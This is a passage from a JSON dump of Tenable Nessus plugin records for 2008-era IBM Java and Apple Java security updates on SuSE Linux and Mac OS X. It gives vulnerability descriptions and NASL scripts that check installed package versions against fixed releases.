sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment with processing GIF images may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5358)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=489052\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5342.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5351.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5356.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5358.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 736.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 189, 200, 264);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-fonts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-ibm-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-fonts-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"java-1_6_0-ibm-jdbc-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-ibm-alsa-1.6.0-124.6.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-ibm-plugin-1.6.0-124.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:10:27", "description": "\nThe remote Mac OS X 10.5 host is running a version of Java for Mac OS X\nthat is missing Update 3. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.", "edition": 11, "published": "2009-02-13T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.5 Update 3", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "modified": "2009-02-13T00:00:00", "cpe": [], "id": "MACOSX_JAVA_10_5_UPDATE3.NASL", "href": "https://www.tenable.com/plugins/nessus/35686", "sourceData": "#TRUSTED a0901eda9b5c18d7c8af9fda66a3ebf22647d9b4c8e2e024263732e0d881dd24a71b9d245fb37d420338d744780aff46d078d120a9256b808f60d80ef7f4d6f65c1e5ea009166cd098e2c5f6632abd9a4b96363f87a9849795f59d3426fd320e21f2ab46efae6ae15f22078ccfd889718cfcd887003110bdf94c3a17ab25ff42dfe39b429290b72a1954b85554955e039cf04ff660818b1aba7d4ccb258ea0e8050e2cf90dabc3fad8251e7026d75a53312de1cc7439a3508861bf5ac8e97b716a79282715cb2a51201d05a46fef8c8464297adb1da8795f781516b5e7b60b224403d1df20889897feea928539f2262167b0d5fd8d85dc213f7113ed62acc9671f3549fd856dc7838adbea847ca53bca9206e6dffd79b93070c2d0cb6e5cfb34e76ce2bd55e855674cbf73c9c1a1092c53a711792e6ec6c6a1e779346b483df7834b892fa969ffce8057702f08903136db5dcdc64d6c1424f0d00a067b17d4942cbbdb9691a307e4adcb7c51cc78ced64890b2cb03a1d16e0e4ca3a6cd3160feac74b66069cd9b0deda3fe814b4bfef98bc0b9ba6837266cf4234100a81cbefc393c6a7148f417e6d9e0a6dbca5093b4806f8d368d69aed1cc17050799570d887308a59126f1b811f9c3ba6ac16925ca0f6c60031ff3a7872ae909071fab3fe583f1c103103ca1fdeed005ff79ad2dd5c262905af3c66aa4992bc5c7af56be8c\n#\n# (C) Tenable Network Security, Inc.\n#\n\nif (!defined_func(\"bn_random\")) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35686);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5340\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\"\n );\n script_bugtraq_id(32892);\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.5 Update 3\");\n script_summary(english:\"Checks for Java Update 3 on Mac OS X 10.5\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\"\nThe remote Mac OS X 10.5 host is running a version of Java for Mac OS X\nthat is missing Update 3. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT3437\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2009/Feb/msg00003.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Java for Mac OS X 10.5 Update 3.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var ret, buf;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n if (buf !~ \"^[0-9]\") exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(0);\n\n\n# Mac OS X 10.5 only.\nuname = get_kb_item(\"Host/uname\");\nif (egrep(pattern:\"Darwin.* 9\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\$.*\\\$<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(0);\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 12.2.2.\n if (\n ver[0] < 12 ||\n (\n ver[0] == 12 &&\n (\n ver[1] < 2 ||\n (ver[1] == 2 && ver[2] < 2)\n )\n )\n ) security_hole(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T16:10:48", "description": "The remote Mac OS X 10.4 host is running a version of Java for Mac OS X\nolder than release 8. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.", "edition": 11, "published": "2009-02-13T00:00:00", "title": "Mac OS X : Java for Mac OS X 10.4 Release 8", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "modified": "2009-02-13T00:00:00", "cpe": [], "id": "MACOSX_JAVA_REL8.NASL", "href": "https://www.tenable.com/plugins/nessus/35685", "sourceData": "#TRUSTED 74b0301aa9b4c6a7f825ea70f12b8c636d775ee3dc4033091b34a857bc0cc1a2ad7c104373687cdea60866f41c2e88db813c457f41cded4dbb700cfaf13b0fe8defc5c15c5432d033dd5d03262438b299850d278c9dd66fc17e9e8d9941d77bc613b68537e157d7d0a77b4c44356d7ad20e1b99212bcbb0c894fdb685ecec376491028b0ed93a072b5de8ff9eb4664d706b5e58885b971a68cad7a3b1133549217a743144f4a2c185e87d6690c29bcb949950c2c821113641b11bfb4c92ca66416f87ceabaff34c163af6e8f431b0ca3e5e9c7b8302d52dde5e45482ecd3a62dc8ceb2d363a2950cd21770338291894e93a21df41091eea9bf833146293cfcef4b66db2e5d555da646cea6096a67e1e75ed5bb2899173a1b6c8a6450976603f1b3db69cca38b319c4414ad76a37c1989792e935ebce3d53c718f11bf10acdfc6b281128024434e7aedd5ecc98b2bd4e1ab81affd36135e88efa2d8e6abc066182e3f964df6b9921eb1c5de92cc74bf13322f02e39ed8f0a54f2550b9ca8e613a61842a8c7ba6f92a010d74958d74453e945d4b650b5cba2fc35506eed1188ba87d5efb432d17141d10e0726834dafdfee8ca91056fff80cc18af095be91c06e226c0dc28326ed477f0b5c3fd4621f030bde7eae46b3b9d3e0fac3aa75f88080361a60492115ee9b14750533fd0adbf8644db6da7ec0c749baaa8632b94368522\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\nif (!defined_func(\"bn_random\")) exit(0);\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35685);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/07/14\");\n\n script_cve_id(\n \"CVE-2008-2086\",\n \"CVE-2008-5340\",\n \"CVE-2008-5342\",\n \"CVE-2008-5343\"\n );\n script_bugtraq_id(32892);\n\n script_name(english:\"Mac OS X : Java for Mac OS X 10.4 Release 8\");\n script_summary(english:\"Check for Java Release 8 on Mac OS X 10.4\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a version of Java that is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Mac OS X 10.4 host is running a version of Java for Mac OS X\nolder than release 8. \n\nThe remote version of this software contains several security\nvulnerabilities in Java Web Start and the Java Plug-in. For instance,\nthey may allow untrusted Java Web Start applications and untrusted Java\napplets to obtain elevated privileges. If an attacker can lure a user\non the affected host into visiting a specially crafted web page with a\nmalicious Java applet, he could leverage these issues to execute\narbitrary code subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.apple.com/kb/HT3436\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.apple.com/archives/security-announce/2009/Feb/msg00002.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Java for Mac OS X 10.4 release 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var ret, buf;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(0);\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n\n if (buf !~ \"^[0-9]\") exit(0);\n\n buf = chomp(buf);\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(0);\n\n\n# Mac OS X 10.4.11 only.\nuname = get_kb_item(\"Host/uname\");\nif (egrep(pattern:\"Darwin.* 8\\.11\\.\", string:uname))\n{\n plist = \"/System/Library/Frameworks/JavaVM.framework/Versions/A/Resources/version.plist\";\n cmd = string(\n \"cat \", plist, \" | \",\n \"grep -A 1 CFBundleVersion | \",\n \"tail -n 1 | \",\n 'sed \\'s/.*string>\\\$.*\\\$<\\\\/string>.*/\\\\1/g\\''\n );\n version = exec(cmd:cmd);\n if (!strlen(version)) exit(0);\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n # Fixed in version 11.8.2.\n if (\n ver[0] < 11 ||\n (\n ver[0] == 11 &&\n (\n ver[1] < 8 ||\n (ver[1] == 8 && ver[2] < 2)\n )\n )\n ) security_hole(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:44:37", "description": "This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\n This vulnerability cannot be exploited by an applet or\n Java Web Start application.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on:\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 5960)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_JAVA-1_5_0-IBM-5960.NASL", "href": "https://www.tenable.com/plugins/nessus/41527", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41527);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"SuSE 10 Security Update : IBM Java 1.5.0 (ZYPP Patch Number 5960)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update brings IBM Java 5 to Service Release 9.\n\nIt fixes the following security problems :\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) may allow an untrusted applet or application to\n list the contents of the home directory of the user\n running the applet or application. (CVE-2008-5350)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with parsing zip files may allow an untrusted\n applet or application to read arbitrary memory locations\n in the process that the applet or application is running\n in. (CVE-2008-5346)\n\n - A vulnerability in Java Web Start and Java Plug-in may\n allow hidden code on a host to make network connections\n to that host and to hijack HTTP sessions using cookies\n stored in the browser. (CVE-2008-5343)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n with applet classloading may allow an untrusted applet\n to read arbitrary files on a system that the applet runs\n on and make network connections to hosts other than the\n host it was loaded from. (CVE-2008-5344)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) image processing code may allow an\n untrusted applet or application to escalate privileges.\n For example, an untrusted applet may grant itself\n permissions to read and write local files or execute\n local applications that are accessible to the user\n running the untrusted applet. (CVE-2008-5359)\n\n - A vulnerability in the Java Runtime Environment may\n allow an untrusted Java Web Start application to\n determine the location of the Java Web Start cache and\n the username of the user running the Java Web Start\n application. (CVE-2008-5341)\n\n - A vulnerability in the Java Runtime Environment (JRE)\n may allow an untrusted Java Web Start application to\n make network connections to hosts other than the host\n that the application is downloaded from. (CVE-2008-5339)\n\n - A vulnerability in the Java Runtime Environment with\n launching Java Web Start applications may allow an\n untrusted Java Web Start application to escalate\n privileges. For example, an untrusted application may\n grant itself permissions to read and write local files\n or execute local applications that are accessible to the\n user running the untrusted application. (CVE-2008-5340)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) with authenticating users through Kerberos may\n lead to a Denial of Service (DoS) to the system as a\n whole, due to excessive consumption of operating system\n resources. (CVE-2008-5348)\n\n - A vulnerability in Java Web Start may allow certain\n trusted operations to be performed, such as modifying\n system properties. (CVE-2008-2086)\n\n - The Java Runtime Environment (JRE) allows code loaded\n from the local filesystem to access localhost. This may\n allow code that is maliciously placed on the local\n filesystem and then subsequently run, to have network\n access to localhost that would not otherwise be allowed\n if the code were loaded from a remote host. This may be\n leveraged to steal cookies and hijack sessions (for\n domains that map a name to the localhost).\n (CVE-2008-5345)\n\n - The UTF-8 (Unicode Transformation Format-8) decoder in\n the Java Runtime Environment (JRE) accepts encodings\n that are longer than the 'shortest' form. This behavior\n is not a vulnerability in Java SE. However, it may be\n leveraged to exploit systems running software that\n relies on the JRE UTF-8 decoder to reject non-shortest\n form sequences. For example, non-shortest form sequences\n may be decoded into illegal URIs, which may then allow\n files that are not otherwise accessible to be read, if\n the URIs are not checked following UTF-8 decoding.\n (CVE-2008-5351)\n\n - The Java Runtime Environment creates temporary files\n with insufficiently random names. This may be leveraged\n to write JAR files which may then be loaded as untrusted\n applets and Java Web Start applications to access and\n provide services from localhost and hence steal cookies.\n (CVE-2008-5360)\n\n - A security vulnerability in the Java Runtime Environment\n (JRE) related to deserializing calendar objects may\n allow an untrusted applet or application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5353)\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5356)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) may allow an untrusted Java\n application that is launched through the command line to\n escalate privileges. For example, the untrusted Java\n application may grant itself permissions to read and\n write local files or execute local applications that are\n accessible to the user running the untrusted Java\n application. (CVE-2008-5354)\n\n This vulnerability cannot be exploited by an applet or\n Java Web Start application.\n\n - A buffer vulnerability in the Java Runtime Environment\n (JRE) with processing fonts may allow an untrusted\n applet or Java Web Start application to escalate\n privileges. For example, an untrusted applet may grant\n itself permissions to read and write local files or\n execute local applications that are accessible to the\n user running the untrusted applet. (CVE-2008-5357)\n\n - A buffer overflow vulnerability in the Java Runtime\n Environment (JRE) with unpacking applets and Java Web\n Start applications using the 'unpack200' JAR unpacking\n utility may allow an untrusted applet or application to\n escalate privileges. For example, an untrusted applet\n may grant itself permissions to read and write local\n files or execute local applications that are accessible\n to the user running the untrusted applet.\n (CVE-2008-5352)\n\n - A security vulnerability in the the Java Web Start\n BasicService allows untrusted applications that are\n downloaded from another system to request local files to\n be displayed by the browser of the user running the\n untrusted application. (CVE-2008-5342)\n\nReferences can be found on:\nhttp://www-128.ibm.com/developerworks/java/jdk/alerts/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-2086.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-5341.html\"\n );\n 